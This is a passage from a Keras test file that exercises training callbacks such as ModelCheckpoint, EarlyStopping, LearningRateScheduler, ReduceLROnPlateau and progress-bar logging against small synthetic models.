r'.*2/2.*20/20.*- loss:.*- my_acc:.*- val_loss:.*- val_my_acc:.*')
io_utils.enable_interactive_logging()
with self.captureWritesToStream(sys.stdout) as printed:
model.fit(
x=training, validation_data=validation, epochs=2, steps_per_epoch=20)
self.assertRegex(printed.contents(), expected_log)
@keras_parameterized.run_with_all_model_types
@keras_parameterized.run_all_keras_modes(always_skip_v1=True)
def test_progbar_logging_with_dataset_and_partial_batch(self):
model = self._get_model(input_shape=(2,))
def generator():
# Have a partial batch at the end.
for _ in range(9):
yield np.random.random(2), 1
training = tf.data.Dataset \
.from_generator(
generator=generator,
output_types=('float64', 'float64'),
output_shapes=([2], [])) \
.batch(2)
validation = tf.data.Dataset \
.from_generator(
generator=generator,
output_types=('float64', 'float64'),
output_shapes=([2], [])) \
.batch(2)
io_utils.enable_interactive_logging()
with self.captureWritesToStream(sys.stdout) as printed:
model.fit(x=training, validation_data=validation)
# Make sure the value of val_ metrics are not zeros.
log_content = printed.contents()
val_loss = re.findall(r'val_loss: (\d\.\d+)', log_content)
self.assertLen(val_loss, 1)
self.assertGreater(float(val_loss[0]), 0.0)
@keras_parameterized.run_with_all_model_types
def test_ModelCheckpoint(self):
if h5py is None:
return # Skip test if models cannot be saved.
model_type = testing_utils.get_model_type()
if model_type == 'subclass':
return # Skip test since subclassed models cannot be saved in .h5 format.
if not tf.__internal__.tf2.enabled():
self.skipTest('Checkpoint callback only available in v2.')
layers = [
keras.layers.Dense(NUM_HIDDEN, input_dim=INPUT_DIM, activation='relu'),
keras.layers.Dense(NUM_CLASSES, activation='softmax')
]
model = testing_utils.get_model_from_layers(layers, input_shape=(3,))
model.compile(
loss='categorical_crossentropy', optimizer='rmsprop', metrics=['acc'])
temp_dir = self.get_temp_dir()
self.addCleanup(shutil.rmtree, temp_dir, ignore_errors=True)
filepath = os.path.join(temp_dir, 'checkpoint.h5')
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = np_utils.to_categorical(y_test)
y_train = np_utils.to_categorical(y_train)
# Case 1
monitor = 'val_loss'
save_best_only = False
mode = 'auto'
cbks = [
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
mode=mode)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=1,
verbose=0)
assert os.path.exists(filepath)
os.remove(filepath)
# Case 2
mode = 'min'
cbks = [
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
mode=mode)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=1,
verbose=0)
assert os.path.exists(filepath)
os.remove(filepath)
# Case 3
mode = 'max'
monitor = 'val_acc'
cbks = [
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
mode=mode)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=1,
verbose=0)
assert os.path.exists(filepath)
os.remove(filepath)
# Case 4
save_best_only = True
cbks = [
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
mode=mode)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=1,
verbose=0)
assert os.path.exists(filepath)
os.remove(filepath)
# Case 5: metric not available.
cbks = [
keras.callbacks.ModelCheckpoint(
filepath,
monitor='unknown',
save_best_only=True)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=1,
verbose=0)
# File won't be written.
assert not os.path.exists(filepath)
# Case 6
save_best_only = False
period = 2
mode = 'auto'
filepath = os.path.join(temp_dir, 'checkpoint.{epoch:02d}.h5')
cbks = [
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
mode=mode,
period=period)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=4,
verbose=1)
assert os.path.exists(filepath.format(epoch=2))
assert os.path.exists(filepath.format(epoch=4))
os.remove(filepath.format(epoch=2))
os.remove(filepath.format(epoch=4))
assert not os.path.exists(filepath.format(epoch=1))
assert not os.path.exists(filepath.format(epoch=3))
# Invalid use: this will raise a warning but not an Exception.
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
mode='unknown')
# Case 7: `ModelCheckpoint` with a combination of `save_freq` and `period`.
# Though `period` is deprecated, we're testing it for
# backward-compatibility.
filepath = os.path.join(temp_dir, 'checkpoint.epoch{epoch:02d}.h5')
cbks = [
keras.callbacks.ModelCheckpoint(
filepath, monitor=monitor, mode=mode, save_freq='epoch', period=5)
]
assert not os.path.exists(filepath.format(epoch=0))
assert not os.path.exists(filepath.format(epoch=5))
model.fit(
x_train,
y_train,
batch_size=2,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=10,
verbose=1)
assert not os.path.exists(filepath.format(epoch=1))
assert not os.path.exists(filepath.format(epoch=2))
assert not os.path.exists(filepath.format(epoch=3))
assert not os.path.exists(filepath.format(epoch=4))
assert os.path.exists(filepath.format(epoch=5))
assert not os.path.exists(filepath.format(epoch=6))
assert os.path.exists(filepath.format(epoch=10))
os.remove(filepath.format(epoch=5))
os.remove(filepath.format(epoch=10))
# Case 8: `ModelCheckpoint` with an integer `save_freq`
filepath = os.path.join(temp_dir, 'checkpoint.epoch{epoch:02d}.h5')
cbks = [
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
mode=mode,
save_freq=15,
period=100) # The period should be ignored (this test tests this).
]
assert not os.path.exists(filepath.format(epoch=3))
model.fit(
x_train,
y_train,
batch_size=2,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=10,
verbose=1)
assert not os.path.exists(filepath.format(epoch=1))
assert not os.path.exists(filepath.format(epoch=2))
assert os.path.exists(filepath.format(epoch=3))
assert not os.path.exists(filepath.format(epoch=4))
assert not os.path.exists(filepath.format(epoch=5))
assert os.path.exists(filepath.format(epoch=6))
assert not os.path.exists(filepath.format(epoch=7))
assert not os.path.exists(filepath.format(epoch=8))
assert os.path.exists(filepath.format(epoch=9))
os.remove(filepath.format(epoch=3))
os.remove(filepath.format(epoch=6))
os.remove(filepath.format(epoch=9))
# Case 9: `ModelCheckpoint` with valid and invalid save_freq argument.
with self.assertRaisesRegex(ValueError, 'Unrecognized save_freq'):
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
mode=mode,
save_freq='invalid_save_freq')
# The following should not raise ValueError.
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
mode=mode,
save_freq='epoch')
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
mode=mode,
save_freq=3)
# Case 10: `ModelCheckpoint` with valid and invalid `options` argument.
with self.assertRaisesRegex(TypeError, 'tf.train.CheckpointOptions'):
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
save_weights_only=True,
mode=mode,
options=tf.saved_model.SaveOptions())
with self.assertRaisesRegex(TypeError, 'tf.saved_model.SaveOptions'):
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
save_weights_only=False,
mode=mode,
options=tf.train.CheckpointOptions())
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
save_weights_only=True,
mode=mode,
options=tf.train.CheckpointOptions())
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
save_weights_only=False,
mode=mode,
options=tf.saved_model.SaveOptions())
# Case 11: `ModelCheckpoint` save model with batch number in filename.
filepath = os.path.join(temp_dir,
'checkpoint.epoch{epoch:02d}batch{batch:02d}.h5')
cbks = [
keras.callbacks.ModelCheckpoint(filepath, monitor=monitor, save_freq=1)
]
assert not os.path.exists(filepath.format(epoch=1, batch=1))
assert not os.path.exists(filepath.format(epoch=1, batch=2))
assert not os.path.exists(filepath.format(epoch=2, batch=1))
assert not os.path.exists(filepath.format(epoch=2, batch=2))
assert not os.path.exists(filepath.format(epoch=3, batch=1))
assert not os.path.exists(filepath.format(epoch=3, batch=2))
assert not os.path.exists(filepath.format(epoch=4, batch=1))
assert not os.path.exists(filepath.format(epoch=4, batch=2))
assert not os.path.exists(filepath.format(epoch=5, batch=1))
assert not os.path.exists(filepath.format(epoch=5, batch=2))
model.fit(
x_train,
y_train,
batch_size=5,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=5,
verbose=1)
assert os.path.exists(filepath.format(epoch=1, batch=1))
assert os.path.exists(filepath.format(epoch=1, batch=2))
assert os.path.exists(filepath.format(epoch=2, batch=1))
assert os.path.exists(filepath.format(epoch=2, batch=2))
assert os.path.exists(filepath.format(epoch=3, batch=1))
assert os.path.exists(filepath.format(epoch=3, batch=2))
assert os.path.exists(filepath.format(epoch=4, batch=1))
assert os.path.exists(filepath.format(epoch=4, batch=2))
assert os.path.exists(filepath.format(epoch=5, batch=1))
assert os.path.exists(filepath.format(epoch=5, batch=2))
os.remove(filepath.format(epoch=1, batch=1))
os.remove(filepath.format(epoch=1, batch=2))
os.remove(filepath.format(epoch=2, batch=1))
os.remove(filepath.format(epoch=2, batch=2))
os.remove(filepath.format(epoch=3, batch=1))
os.remove(filepath.format(epoch=3, batch=2))
os.remove(filepath.format(epoch=4, batch=1))
os.remove(filepath.format(epoch=4, batch=2))
os.remove(filepath.format(epoch=5, batch=1))
os.remove(filepath.format(epoch=5, batch=2))
# Case 12: ModelCheckpoint saves model with initial_value_threshold param
mode = 'max'
monitor = 'val_acc'
initial_value_threshold = 0
save_best_only = True
filepath = os.path.join(temp_dir, 'checkpoint.h5')
cbks = [
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
initial_value_threshold=initial_value_threshold,
mode=mode)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=1,
verbose=0)
assert os.path.exists(filepath)
os.remove(filepath)
# Case 13: ModelCheckpoint saves model with initial_value_threshold param
mode = 'auto'
monitor = 'val_loss'
initial_value_threshold = None
save_best_only = True
cbks = [
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
initial_value_threshold=initial_value_threshold,
mode=mode)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=1,
verbose=0)
assert os.path.exists(filepath)
os.remove(filepath)
# Case 14: ModelCheckpoint doesnt save model if loss was minimum earlier
mode = 'min'
monitor = 'val_loss'
initial_value_threshold = 0
save_best_only = True
cbks = [
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
initial_value_threshold=initial_value_threshold,
mode=mode)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=1,
verbose=0)
assert not os.path.exists(filepath)
# Case 15: ModelCheckpoint doesnt save model if loss was min earlier in auto
# mode
mode = 'auto'
monitor = 'val_loss'
initial_value_threshold = 0
save_best_only = True
cbks = [
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
initial_value_threshold=initial_value_threshold,
mode=mode)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=1,
verbose=0)
assert not os.path.exists(filepath)
@testing_utils.run_v2_only
def test_ModelCheckpoint_subclass_save_weights_false(self):
model = testing_utils.get_small_subclass_mlp(NUM_HIDDEN, NUM_CLASSES)
model.compile(
loss='categorical_crossentropy', optimizer='rmsprop', metrics=['acc'])
temp_dir = self.get_temp_dir()
self.addCleanup(shutil.rmtree, temp_dir, ignore_errors=True)
filepath = os.path.join(temp_dir, 'checkpoint')
cbks = [keras.callbacks.ModelCheckpoint(
filepath, save_weights_only=False)]
(x_train, y_train), _ = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_train = np_utils.to_categorical(y_train, num_classes=NUM_CLASSES)
model.fit(
x_train,
y_train,
callbacks=cbks,
epochs=1,
verbose=0)
# Check that the filepath is a SavedModel directory.
self.assertIn('saved_model.pb', os.listdir(filepath))
def _get_dummy_resource_for_model_checkpoint_testing(self):
def get_input_datasets():
# Simple training input.
train_input = [[1.]] * 16
train_label = [[0.]] * 16
ds = tf.data.Dataset.from_tensor_slices((train_input, train_label))
return ds.batch(8, drop_remainder=True)
# Very simple bias model to eliminate randomness.
optimizer = gradient_descent.SGD(0.1)
model = sequential.Sequential()
model.add(testing_utils.Bias(input_shape=(1,)))
model.compile(loss='mae', optimizer=optimizer, metrics=['mae'])
train_ds = get_input_datasets()
temp_dir = self.get_temp_dir()
filepath = os.path.join(temp_dir, 'checkpoint.epoch{epoch:02d}.h5')
# The filepath shouldn't exist at the beginning.
self.assertFalse(os.path.exists(filepath))
callback = keras.callbacks.ModelCheckpoint(
filepath=filepath, save_weights_only=True)
return model, train_ds, callback, filepath
def _run_load_weights_on_restart_test_common_iterations(self):
(model, train_ds, callback,
filepath) = self._get_dummy_resource_for_model_checkpoint_testing()
initial_epochs = 3
model.fit(train_ds, epochs=initial_epochs, callbacks=[callback])
# The files should exist after fitting with callback.
for epoch in range(initial_epochs):
self.assertTrue(os.path.exists(filepath.format(epoch=epoch + 1)))
self.assertFalse(os.path.exists(filepath.format(epoch=initial_epochs + 1)))
self.assertEqual(
callback._get_most_recently_modified_file_matching_pattern(filepath),
filepath.format(epoch=initial_epochs))
model.fit(train_ds, epochs=1)
weights_after_one_more_epoch = model.get_weights()
# The filepath should continue to exist after fitting without callback.
for epoch in range(initial_epochs):
self.assertTrue(os.path.exists(filepath.format(epoch=epoch + 1)))
return model, train_ds, filepath, weights_after_one_more_epoch
@staticmethod
def get_ModelCheckpoint_load_weights_on_restart_true_test(save_weights_only):
def func(self):
(model, train_ds, filepath, weights_after_one_more_epoch
) = self._run_load_weights_on_restart_test_common_iterations()
# Sleep for some short time period ensuring the files are created with
# a different time (in MacOS OSS the granularity is only 1 second).
time.sleep(2)
callback = keras.callbacks.ModelCheckpoint(
filepath=filepath,
save_weights_only=save_weights_only,
load_weights_on_restart=True)
model.fit(train_ds, epochs=1, callbacks=[callback])
weights_after_model_restoring_and_one_more_epoch = model.get_weights()
self.assertEqual(
callback._get_most_recently_modified_file_matching_pattern(filepath),
filepath.format(epoch=1))
model.fit(
train_ds,
epochs=1,
callbacks=[
keras.callbacks.ModelCheckpoint(
filepath=filepath,
save_weights_only=save_weights_only,
load_weights_on_restart=True)
])
weights_with_one_final_extra_epoch = model.get_weights()
# Asserting the weights one epoch after initial fitting and another epoch
# after that are closed, if a ModelCheckpoint with
# load_weights_on_restart=True is given (so the model is restored at the
# beginning of training).
self.assertAllClose(weights_after_one_more_epoch,
weights_after_model_restoring_and_one_more_epoch)
self.assertNotAllClose(weights_after_one_more_epoch,
weights_with_one_final_extra_epoch)
return func
@staticmethod
def get_ModelCheckpoint_load_weights_on_restart_false_test(save_weights_only):
def func(self):
(model, train_ds, filepath, weights_after_one_more_epoch
) = self._run_load_weights_on_restart_test_common_iterations()
model.fit(
train_ds,
epochs=1,
callbacks=[
keras.callbacks.ModelCheckpoint(
filepath=filepath, save_weights_only=save_weights_only)
])
weights_after_model_restoring_and_one_more_epoch = model.get_weights()
# Asserting the weights one epoch after initial fitting and another epoch
# after that are different, if a ModelCheckpoint with
# load_weights_on_restart=False is given (so the model is not restored at
# the beginning of training).
self.assertNotAllClose(weights_after_one_more_epoch,
weights_after_model_restoring_and_one_more_epoch)
return func
test_model_checkpoint_load_weights_on_restart_true_save_weights_only_true = \
get_ModelCheckpoint_load_weights_on_restart_true_test.__func__(True)
test_model_checkpoint_load_weights_on_restart_true_save_weights_only_false = \
get_ModelCheckpoint_load_weights_on_restart_true_test.__func__(False)
test_model_checkpoint_load_weights_on_restart_false_save_weights_only_true = \
get_ModelCheckpoint_load_weights_on_restart_false_test.__func__(True)
test_model_checkpoint_load_weights_on_restart_false_save_weights_only_false \
= get_ModelCheckpoint_load_weights_on_restart_false_test.__func__(False)
def test_ModelCheckpoint_override_if_file_exist(self):
(model, train_ds, filepath,
_) = self._run_load_weights_on_restart_test_common_iterations()
# Sleep for some short time period to ensure the files are created with
# a different time (in MacOS OSS the granularity is only 1 second).
time.sleep(2)
callback = keras.callbacks.ModelCheckpoint(
filepath=filepath, save_weights_only=True)
model.load_weights(
callback._get_most_recently_modified_file_matching_pattern(filepath))
weights_before_additional_fit = model.get_weights()
model.fit(train_ds, epochs=1, callbacks=[callback])
model.load_weights(
callback._get_most_recently_modified_file_matching_pattern(filepath))
weights_after_additional_fit = model.get_weights()
self.assertNotAllClose(weights_before_additional_fit,
weights_after_additional_fit)
def test_fit_with_ModelCheckpoint_with_tf_config(self):
(model, train_ds, callback,
_) = self._get_dummy_resource_for_model_checkpoint_testing()
os.environ['TF_CONFIG'] = json.dumps({
'cluster': {
'worker': ['localhost:23333']
},
'task': {
'type': 'worker',
'index': 0
}
})
# `model.fit()` should work regardless of the presence of `TF_CONFIG`.
model.fit(train_ds, epochs=1, callbacks=[callback])
def test_fit_with_ModelCheckpoint_with_dir_as_h5_filepath(self):
(model, train_ds, callback,
filepath) = self._get_dummy_resource_for_model_checkpoint_testing()
temp_dir = self.get_temp_dir()
filepath = os.path.join(temp_dir, 'temp.h5')
self.assertFalse(os.path.exists(filepath))
os.mkdir(filepath)
self.assertTrue(os.path.exists(filepath))
callback = keras.callbacks.ModelCheckpoint(filepath=filepath)
with self.assertRaisesRegex(
IOError, 'Please specify a non-directory '
'filepath for ModelCheckpoint.'):
model.fit(train_ds, epochs=1, callbacks=[callback])
def test_ModelCheckpoint_with_bad_path_placeholders(self):
(model, train_ds, callback,
filepath) = self._get_dummy_resource_for_model_checkpoint_testing()
temp_dir = self.get_temp_dir()
filepath = os.path.join(temp_dir, 'chkpt_{epoch:02d}_{mape:.2f}.h5')
callback = keras.callbacks.ModelCheckpoint(filepath=filepath)
with self.assertRaisesRegex(KeyError, 'Failed to format this callback '
'filepath.*'):
model.fit(train_ds, epochs=1, callbacks=[callback])
def test_ModelCheckpoint_nonblocking(self):
filepath = self.get_temp_dir()
# Should only cause a sync block when saving is actually performed.
callback = keras.callbacks.ModelCheckpoint(filepath=filepath, save_freq=100)
self.assertTrue(callback._supports_tf_logs)
model = keras.Sequential([keras.layers.Dense(1)])
cb_list = keras.callbacks.CallbackList([callback],
model=model,
epochs=1,
steps=10,
verbose=0)
tensor = tf.convert_to_tensor(1.)
def mock_numpy():
raise RuntimeError(
'If this error is seen, ModelCheckpoint is causing a blocking '
'NumPy conversion even when not checkpointing.')
tensor.numpy = mock_numpy
logs = {'metric': tensor}
cb_list.on_train_begin(logs)
cb_list.on_epoch_begin(0, logs)
cb_list.on_train_batch_begin(0, logs)
cb_list.on_train_batch_end(0, logs)
cb_list.on_epoch_end(0, logs)
cb_list.on_train_end(logs)
cb_list.on_test_begin(logs)
cb_list.on_test_batch_begin(0, logs)
cb_list.on_test_batch_end(0, logs)
cb_list.on_test_end(logs)
cb_list.on_predict_begin(logs)
cb_list.on_predict_batch_begin(logs)
cb_list.on_predict_batch_end(logs)
cb_list.on_predict_end(logs)
def test_verbose_2_logging(self):
data = np.random.random((100, 1))
labels = np.where(data > 0.5, 1, 0)
model = keras.models.Sequential((keras.layers.Dense(
1, input_dim=1, activation='relu'), keras.layers.Dense(
1, activation='sigmoid'),))
model.compile(
optimizer='sgd', loss='binary_crossentropy', metrics=['accuracy'])
expected_log = r'(.*- loss:.*- acc.*:.*epoch)+'
with self.captureWritesToStream(sys.stdout) as printed:
model.fit(data, labels, verbose=2, epochs=20)
self.assertRegex(printed.contents(), expected_log)
def test_ProgbarLogger_verbose_2_nonblocking(self):
# Should only cause a sync block on epoch end methods.
callback = keras.callbacks.ProgbarLogger(count_mode='steps')
self.assertTrue(callback._supports_tf_logs)
model = keras.Sequential([keras.layers.Dense(1)])
cb_list = keras.callbacks.CallbackList([callback],
model=model,
epochs=1,
steps=10,
verbose=2)
tensor = tf.convert_to_tensor(1.)
def mock_numpy():
raise RuntimeError(
'If this error is seen, ModelCheckpoint is causing a blocking '
'NumPy conversion even when not checkpointing.')
tensor.numpy = mock_numpy
logs = {'metric': tensor}
cb_list.on_train_begin(logs)
cb_list.on_epoch_begin(0, logs)
cb_list.on_train_batch_begin(0, logs)
cb_list.on_train_batch_end(0, logs)
cb_list.on_test_begin(logs)
cb_list.on_test_batch_begin(0, logs)
cb_list.on_test_batch_end(0, logs)
cb_list.on_test_end(logs)
with self.assertRaisesRegex(RuntimeError, 'NumPy conversion'):
# on_epoch_end should still block.
cb_list.on_epoch_end(0, logs)
cb_list.on_train_end(logs)
def test_EarlyStopping(self):
with self.cached_session():
np.random.seed(123)
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = np_utils.to_categorical(y_test)
y_train = np_utils.to_categorical(y_train)
model = testing_utils.get_small_sequential_mlp(
num_hidden=NUM_HIDDEN, num_classes=NUM_CLASSES, input_dim=INPUT_DIM)
model.compile(
loss='categorical_crossentropy', optimizer='rmsprop', metrics=['acc'])
cases = [
('max', 'val_acc'),
('min', 'val_loss'),
('auto', 'val_acc'),
('auto', 'loss'),
('unknown', 'unknown')
]
for mode, monitor in cases:
patience = 0
cbks = [
keras.callbacks.EarlyStopping(
patience=patience, monitor=monitor, mode=mode)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=5,
verbose=0)
def test_EarlyStopping_reuse(self):
with self.cached_session():
np.random.seed(1337)
patience = 3
data = np.random.random((100, 1))
labels = np.where(data > 0.5, 1, 0)
model = keras.models.Sequential((keras.layers.Dense(
1, input_dim=1, activation='relu'), keras.layers.Dense(
1, activation='sigmoid'),))
model.compile(
optimizer='sgd', loss='binary_crossentropy', metrics=['accuracy'])
weights = model.get_weights()
# This should allow training to go for at least `patience` epochs
model.set_weights(weights)
stopper = keras.callbacks.EarlyStopping(monitor='acc', patience=patience)
hist = model.fit(data, labels, callbacks=[stopper], verbose=0, epochs=20)
assert len(hist.epoch) >= patience
def test_EarlyStopping_with_baseline(self):
with self.cached_session():
np.random.seed(1337)
baseline = 0.6
(data, labels), _ = testing_utils.get_test_data(
train_samples=100,
test_samples=50,
input_shape=(1,),
num_classes=NUM_CLASSES)
model = testing_utils.get_small_sequential_mlp(
num_hidden=1, num_classes=1, input_dim=1)
model.compile(
optimizer='sgd', loss='binary_crossentropy', metrics=['acc'])
stopper = keras.callbacks.EarlyStopping(monitor='acc',
baseline=baseline)
hist = model.fit(data, labels, callbacks=[stopper], verbose=0, epochs=20)
assert len(hist.epoch) == 2
patience = 3
stopper = keras.callbacks.EarlyStopping(monitor='acc',
patience=patience,
baseline=baseline)
hist = model.fit(data, labels, callbacks=[stopper], verbose=0, epochs=20)
assert len(hist.epoch) >= patience
def test_EarlyStopping_final_weights_when_restoring_model_weights(self):
class DummyModel:
def __init__(self):
self.stop_training = False
self.weights = -1
def get_weights(self):
return self.weights
def set_weights(self, weights):
self.weights = weights
def set_weight_to_epoch(self, epoch):
self.weights = epoch
early_stop = keras.callbacks.EarlyStopping(monitor='val_loss',
patience=2,
restore_best_weights=True)
early_stop.model = DummyModel()
losses = [0.2, 0.15, 0.1, 0.11, 0.12]
# The best configuration is in the epoch 2 (loss = 0.1000).
epochs_trained = 0
early_stop.on_train_begin()
for epoch in range(len(losses)):
epochs_trained += 1
early_stop.model.set_weight_to_epoch(epoch=epoch)
early_stop.on_epoch_end(epoch, logs={'val_loss': losses[epoch]})
if early_stop.model.stop_training:
break
# The best configuration is in epoch 2 (loss = 0.1000),
# and while patience = 2, we're restoring the best weights,
# so we end up at the epoch with the best weights, i.e. epoch 2
self.assertEqual(early_stop.model.get_weights(), 2)
# Check early stopping when no model beats the baseline.
early_stop = keras.callbacks.EarlyStopping(
monitor='val_loss', patience=5, baseline=0.5, restore_best_weights=True)
early_stop.model = DummyModel()
losses = [0.9, 0.8, 0.7, 0.71, 0.72, 0.73]
# The best configuration is in the epoch 2 (loss = 0.7000).
epochs_trained = 0
early_stop.on_train_begin()
for epoch in range(len(losses)):
epochs_trained += 1
early_stop.model.set_weight_to_epoch(epoch=epoch)
early_stop.on_epoch_end(epoch, logs={'val_loss': losses[epoch]})
if early_stop.model.stop_training:
break
# No epoch improves on the baseline, so we should train for only 5 epochs,
# and restore the second model.
self.assertEqual(epochs_trained, 5)
self.assertEqual(early_stop.model.get_weights(), 2)
def test_RemoteMonitor(self):
if requests is None:
self.skipTest('`requests` required to run this test')
return None
monitor = keras.callbacks.RemoteMonitor()
# This will raise a warning since the default address in unreachable:
monitor.on_epoch_end(0, logs={'loss': 0.})
def test_LearningRateScheduler(self):
with self.cached_session():
np.random.seed(1337)
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = np_utils.to_categorical(y_test)
y_train = np_utils.to_categorical(y_train)
model = testing_utils.get_small_sequential_mlp(
num_hidden=NUM_HIDDEN, num_classes=NUM_CLASSES, input_dim=INPUT_DIM)
model.compile(
loss='categorical_crossentropy',
optimizer='sgd',
metrics=['accuracy'])
cbks = [
keras.callbacks.LearningRateScheduler(
lambda x: 1. / (1. + x), verbose=1)
]
io_utils.enable_interactive_logging()
with self.captureWritesToStream(sys.stdout) as printed:
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=5)
self.assertIn('LearningRateScheduler setting learning rate to 1.0',
printed.contents())
assert (
float(keras.backend.get_value(
model.optimizer.lr)) - 0.2) < keras.backend.epsilon()
cbks = [keras.callbacks.LearningRateScheduler(lambda x, lr: lr / 2)]
model.compile(
loss='categorical_crossentropy',
optimizer='sgd',
metrics=['accuracy'])
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=2,
verbose=0)
assert (
float(keras.backend.get_value(
model.optimizer.lr)) - 0.01 / 4) < keras.backend.epsilon()
cbks = [
keras.callbacks.LearningRateScheduler(
lambda epoch, _: learning_rate_schedule.CosineDecay(0.01, 2)
(epoch))
]
model.compile(
loss='categorical_crossentropy',
optimizer='sgd',
metrics=['accuracy'])
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=2,
verbose=0)
cosine_decay_np = 0.5 * (1 + np.cos(np.pi * (1 / 2)))
decayed_learning_rate = 0.01 * cosine_decay_np
assert (float(keras.backend.get_value(model.optimizer.lr)) -
decayed_learning_rate) < keras.backend.epsilon()
def test_ReduceLROnPlateau(self):
with self.cached_session():
np.random.seed(1337)
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = np_utils.to_categorical(y_test)
y_train = np_utils.to_categorical(y_train)
def make_model():
tf.compat.v1.set_random_seed(1234)
np.random.seed(1337)
model = testing_utils.get_small_sequential_mlp(
num_hidden=NUM_HIDDEN, num_classes=NUM_CLASSES, input_dim=INPUT_DIM)
model.compile(
loss='categorical_crossentropy',
optimizer=gradient_descent.SGD(lr=0.1))
return model
# TODO(psv): Make sure the callback works correctly when min_delta is
# set as 0. Test fails when the order of this callback and assertion is
# interchanged.
model = make_model()
cbks = [
keras.callbacks.ReduceLROnPlateau(
monitor='val_loss',
factor=0.1,
min_delta=0,
patience=1,
cooldown=5)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=2,
verbose=0)
self.assertAllClose(
float(keras.backend.get_value(model.optimizer.lr)), 0.1, atol=1e-4)
model = make_model()
# This should reduce the LR after the first epoch (due to high epsilon).
cbks = [
keras.callbacks.ReduceLROnPlateau(
monitor='val_loss',
factor=0.1,
min_delta=10,
patience=1,
cooldown=5)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=2,
verbose=2)
self.assertAllClose(
float(keras.backend.get_value(model.optimizer.lr)), 0.01, atol=1e-4)
def test_ReduceLROnPlateau_patience(self):
class DummyOptimizer:
def __init__(self):
self.lr = keras.backend.variable(1.0)
class DummyModel:
def __init__(self):
self.optimizer = DummyOptimizer()
reduce_on_plateau = keras.callbacks.ReduceLROnPlateau(
monitor='val_loss', patience=2)
reduce_on_plateau.model = DummyModel()
losses = [0.0860, 0.1096, 0.1040]
lrs = []
for epoch in range(len(losses)):
reduce_on_plateau.on_epoch_end(epoch, logs={'val_loss': losses[epoch]})
lrs.append(keras.backend.get_value(reduce_on_plateau.model.optimizer.lr))
# The learning rates should be 1.0 except the last one
for lr in lrs[:-1]:
self.assertEqual(lr, 1.0)
